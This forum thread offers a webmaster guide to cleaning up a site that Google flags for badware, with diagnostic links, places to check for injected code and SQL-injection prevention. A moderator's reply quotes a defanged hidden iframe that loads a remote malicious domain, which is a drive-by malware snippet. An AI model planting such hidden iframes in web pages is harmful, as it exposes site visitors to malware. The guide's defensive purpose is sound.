My site has been flagged by Google (methods to fix)
by beckerist
almost 5 years ago

I’m reposting an older report first with a different title. I have a few more reference documents I’ve recently written in my experiences that I will be posting in the coming days. To the people that run the site, please email me. Erica knows the address.

How to fix Google reporting your site as “This site may harm your computer.”

I’m seeing an influx of these on this board, so I thought I’d take the time to show YOU how to figure this out on your own. This is written for a basic user.

Definitions to know: chmod, .htaccess (apache,) http.conf (apache,) sql injection, javascript

A. Why is my site being flagged?
1. Google’s fault
2. Hosting providers fault
3. My fault
4. Most likely…
B. How do I remove the baddness?
1. Research
2. Identifying
3. Removing
4. Preventing
5. Rule of thumb — knowledge is power
C. How do I get back into Google’s good graces?
1. Links

A. Why is my site being flagged?

— Short answer: chances are you have badware on your site. This is not always the case though.

1. Google’s fault: On Saturday, January 31st 2009, during the wee hours of the early morn’, every single webpage (searchable through Google) contained badware! In reality, Google has since explained that they updated the list of suspicious sites and inadvertently included a wild card entry, flagging the whole Internet. It was resolved about 45 minutes later.

2. Hosting providers fault: In my personal experience, this accounts for roughly 20% of all cases I’ve come across. This can manifest itself in a few different ways. Your hosting provider:
-has old/outdated/buggy/insecure code “pre-packaged” for your site
-has not properly secured their own servers
-has gullible tech-support
The ways to resolve this all involve either contacting your provider OR switching providers. The first is resolved easily by sending a list of the buggy/outdated software (for instance: phpBB2 vs. phpBB3) to them, with maybe links to the newest versions. If the company cares about security, they will hop right on it!
The second is again up to you (in a way.) If their servers are not secure, they probably aren’t even aware of it. Once you’ve figured out what your site is infected with (see B1-2) you can inform your provider with these details. A big deterrent to reporting these issues is “eh, someone else will do it” or “I’m sure they’ll fix it.” If they don’t know, tell them! If you use a completely hosted service (something like blogspot for instance) and THEY have buggy software, again all you can do is report.
The last issue is something that is unfortunately unavoidable. I recommend researching each provider BEFORE purchasing their services. There have been reported cases of “hacker calls tech support, claims to be someone else (like a government official or RIAA lawyer,) tech support is either scared, stupid, or maybe just naive and does something with the power they have to disrupt YOUR service.”
It happens, it’s annoying, but if this is what happened you should be able to find out quickly. All customer service departments world-wide record or at least transcribe the details of every call.

3. My fault: Chances are, the reason you have badware is because of something YOU did. Say you install a CMS. In the installation process you are required to chmod some files to 777 so that they may be written to a static file. Upon finishing the installation you forget to delete the installation folder or chmod. You have left a file (full of settings AND with full writable and executable rights to EVERYONE) on your server. It isn’t a big stretch for Mrs. Hacker to append some code to the beginning of the file forcing your entire site to redirect to hers.

4. Most likely: it’s a combination of 1 and 2. Web servers and hosting providers follow the rule just like everything else: freedom and security are exclusive. The more freedom you give your webmasters, the less secure your system becomes. By allowing you to install buggy code, and by not preventing bad code from being executed, the hosting providers are essentially giving you the freedom (vs. security of NOT) to open their systems up to this badware. If they didn’t though, there are plenty of other providers out there you could turn to to meet your demands! It’s a catch-22, and as a result we unfortunately (fortunately?) have to deal with badware.

B. How do I remove the badness?

— Short answer: research, identification, removal and prevention!

1. Research: There are plenty of places you can visit to determine what is wrong with your site. Personally I use Google for just about every single step! The first step of the research is already done if you’ve seen your site flagged through a web search. You know that something is wrong. The next step is knowing where to turn to figure out exactly what that is.
2. Identifying: First, I suggest you go here:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.yoursite.com/the_page_that’s_infected.html
This will show you all the pages on your site that are affected as well as MORE information that is relevant to figuring out what’s wrong. Take note of the websites that your users might be redirected to, as well as the websites that are executing malicious code.
The next step I take from here is to plug those sites (more than 1 at a time) into Google and see if anyone else has experienced this particular variation. Chances are you’re not the first, and if you’re lucky a resolution might already have been posted! If not, it’s time to move to the “manual removal” section.
Other links to help you determine what the issue might be:
http://www.unmaskparasites.com/security-report/?page=http://www.yoursite.com/the_page_that’s_infected.html (if it’s up)
http://stopbadware.org/home/reportsearch?searchtext=http://www.yoursite.com/the_page_that’s_infected.html

3. Removal: Manual removal of these baddies can come in a few different flavors. The most important thing to know is where to look.
A) A lot of hijackings occur through the manipulation of config files on the server. Know what software your web server is running! If it’s Apache, you will need to check your http.conf file, your .htaccess file(s) and your .htusers files for any anomalies. If you don’t know how to do this, I again suggest using Google to look it up! If you are using IIS make sure there are no unknown modules and no strange users. Other web servers most likely will have some sort of setup AND some sort of execution. Make sure in all instances to work your way through all the possible areas of execution on your server (can be found on Google.)
B) More hijackings can occur through the manipulation of your database! Using SQL injection methods, hackers can insert ANY plain-text code (ie: javascript) into a page that just blindly posts and reads without any sort of security. If you have written a script where you use a GET variable directly in an SQL query, anyone with a bit of know-how can do WHATEVER THEY WANT in your database. Say you have a blog with comments, and the comments are not secure…someone could either post a comment OR just go to the posting URL in their web browser with the appropriate code, and as a result can put malicious code into your site. If you use a database, check that too for any anomalies. Most DB engines have a search function. Use it to look for the sites listed you found on the Safebrowsing Google page.
C) This is the easiest one, simply use your editor (Frontpage, Dreamweaver, etc) to “get” your entire site, and search through your local files for any instances of those pages, again found on the SB Google page.

4. Prevention: Dealing with each of the categories listed in #3, there are a few things you can do:
A) Make sure that the server hosing your web pages is secure! Have your hosting provider TELL you when the last time they ran Windows Updates was. Verify the version numbers of the scripts you are running (bulletin boards, etc…) are the MOST up to date. Things are upgraded for a reason, and the main reason is generally security! If they aren’t, talk to your hosting provider as it only helps them too.
B) Make sure that the scripts YOU write are secure. Research possible SQL injection methods, use strong passwords, and NEVER TRUST ANYONE. Even if you and only you know about a secret script that isn’t secure on your website doesn’t mean it will stay that way. Lock everything down, even if it’s not exactly convenient. There are always secure ways of doing what you need to do.
C) Be pro-active. Look at your pages, scour through every piece of them. Know your sites! Prevention can only fully happen if you KNOW how the offense occurred. If you don’t, than you need to dive deeper into your pages because someone else certainly has.

5. Rule of thumb: Knowledge is power. If you learn ANYTHING from this please share! The more people that know, the harder it makes it for the hackers.

C. How do I get back into Google’s good graces?
1. Links: http://www.google.com/support/webmasters/bin/answer.py?answer=35843

So that’s it! I hope you can take something from this, but as always feel free to post your questions on Badwarebusters.org

by Cometcom1
almost 5 years ago

Very good contents. thumbs up

As a note of information: Erica is no longer in an official function part of Stopbadware or Badwarebusters, so allthough she might have your e-mail registered, we moderators do not have or need access to those information.

The contents of you posting pretty clearly describes the way I look at each individual request for help here, and everyone can do this by themselves, though I suspect it’s easier just to let one of us do the legwork ;)

by konusarock
almost 5 years ago

selam www.bahane.net benim sitemde böyle birşey aldı virüsleri temizledim yöneticilerden rica ediyorum kontrol etsinler

by Kaleh
almost 5 years ago

Many pages contain malscript referencing hugebestbuy .cn

< ifr am e src=“http ://hugebestbuy .cn: 8080/index .php” width=185 height=109 style="visibility: hidden "> < /ifr ame>

*After cleaning and securing your site, “Request a Review” through your Google Webmaster Tools Account . Sites must be added and ownership verified first.

Google Webmaster Tools
Google Malware FAQ – Request a Review

About Contact Us Terms & Conditions Privacy Policy Copyright